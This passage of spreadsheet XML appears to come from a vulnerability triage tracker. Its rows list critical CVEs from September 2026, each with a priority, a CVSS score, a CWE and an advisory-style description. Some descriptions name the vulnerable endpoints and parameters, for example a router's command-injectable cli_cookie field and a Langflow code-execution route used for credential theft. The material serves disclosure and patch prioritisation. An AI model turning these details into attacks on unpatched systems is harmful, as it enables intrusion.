      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>UVdesk Community Skeleton through 1.1.8 fails to authenticate or validate installation state on wizard endpoints in ConfigureHelpdesk controller actions. Unauthenticated attackers can repoint the database and create super administrator accounts by submitting crafted requests to wizard endpoints, gaining full control of the instance.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92805</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12944</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql, redis</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.0 can allow attackers to execute arbitrary Python code with root privileges (UID=0) on the Langflow server by submitting components containing socket or urllib imports. This enables: (1) AWS credential theft via IMDSv1 SSRF with full IAM role permissions, (2) arbitrary file exfiltration from the container filesystem, and (3) lateral movement to internal services (PostgreSQL, Redis) within the Docker network. The scanner incorrectly returns "validated": true, providing a false security signal.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12944</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20331</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20331 are related to the failure of protection mechanisms issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-693.</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20331</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82107</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information and bypass security restrictions due to improper authentication.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82107</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92716</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>Shuffle through 2.2.1 contains a cross-tenant privilege escalation vulnerability in the HandleApiGeneration endpoint that allows administrators to reset and read API keys of non-administrator users in other organizations. Attackers with admin privileges in one organization can supply arbitrary user IDs to generate valid API keys for users in different organizations, enabling account takeover across tenant boundaries.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92716</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15640</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>1443cd92-d354-46d2-9290-d812316ca43a</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Under certain conditions a valid SAML IdP response may be used to impersonate another Secret Server user.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15640</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73453</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated P4Runtime (Programming Protocol-Independent Packet Processors Runtime) client can achieve arbitrary code execution under certain conditions on affected platforms running Arista EOS configured with P4Runtime. P4Runtime is disabled by default in Arista EOS. By crafting a malicious packet during the initiation of a P4Runtime session, an attacker can obtain complete administrative control over the compromised switch.
This issue was discovered internally by Arista, and the company is not aware of any malicious exploitation of this vulnerability in customer networks.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73453</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77411</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, readLongstr in read.go returns an empty string and a nil error when a declared AMQP longstr length exceeds 0x7FFFFFFF instead of returning ErrSyntax. The function leaves the declared field bytes unread, while readTable treats the operation as successful and continues parsing from the wrong offset. A malicious or compromised broker can provide an oversized longstr in a table field and desynchronize subsequent AMQP parsing, causing attacker-controlled trailing bytes to be interpreted as later fields or frames and disrupting connection integrity and availability. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77411</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58146</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router is vulnerable to OS command injection vulnerability. The vulnerability exists within the /cgi-bin/portal.cgi endpoint, specifically through the cli_cookie POST parameter. The cli_cookie parameter value is directly concatenated into a find command string without proper sanitization. This allows a remote, unauthenticated attacker to inject and execute arbitrary shell commands as root on the underlying operating system.
This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58146</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73447</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>A privileged attacker can exploit certain operation to execute arbitrary commands with root privileges, leading to full device compromise. An authenticated user can exploit gRPC Network Security Interface (gNSI) Certz service on Arista EOS-based products to escalate privileges and execute arbitrary OS commands via a crafted Certz Rotate request. The Bootz service is also affected.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73447</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73461</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>On affected EOS platforms with AAA-based gRPC authorization enabled for OpenConfig, gRPC requests of an authenticated user to OpenConfig may use the wrong privilege level, resulting in an authorization using the wrong AAA method list. This does not impact non-gRPC OpenConfig requests such as NETCONF.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73461</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77405</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-326</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, tlsConfigFromURI in uri.go creates tls.Config values without setting MinVersion to tls.VersionTLS12. Builds using a Go runtime whose default permits TLS 1.0 or TLS 1.1 can therefore negotiate an obsolete protocol version when connecting through an amqps URI. A network attacker able to influence TLS negotiation with such a legacy build may weaken transport protection for AMQP messages and credentials. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77405</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81046</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr">
        <is>
          <t>dell:latitude_3330, dell:latitude_3420, dell:latitude_3440, dell:latitude_3450, dell:latitude_5440, dell:latitude_5450, dell:latitude_5520, dell:latitude_5530, dell:latitude_5540, dell:latitude_5550</t>
        </is>
      </c>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Protection Mechanism Failure vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Arbitrary Code Execution within the application context.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81046</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85192</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Authenticated, privileged remote code execution in Conditional Content extension for Joomla &lt; 8.0.0 - Conditional Content Pro accepts inline PHP Condition Rules in article syntax. In affected versions, the PHP is passed to the Conditions evaluator without checking who authored the article. Joomla's normal Author text filter preserves the syntax, so publishing the article causes the code to run as the web-server process.</t>
        </is>
      </c>
      <c r="S78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85192</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90680</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in D-Link DIR-823G 1.0.2B05_20181207. The impacted element is the function strcpy of the file /HNAP1/SetStaticRouteSettings of the component HNAP1. The manipulation of the argument PAddress/SubnetMask/Gateway results in stack-based buffer overflow. The attack can be launched remotely.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90680</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90937</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>froxlor versions before 2.2.5 fail to validate newline characters in subdomain redirect URLs, allowing authenticated customers to inject arbitrary nginx or Apache configuration directives. Attackers can supply URLs containing literal newlines that are written verbatim into vhost config files during cron rebuild, enabling web server configuration corruption, denial of service, or hijacking of HTTP responses across hosted domains.</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90937</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15639</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>1443cd92-d354-46d2-9290-d812316ca43a</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
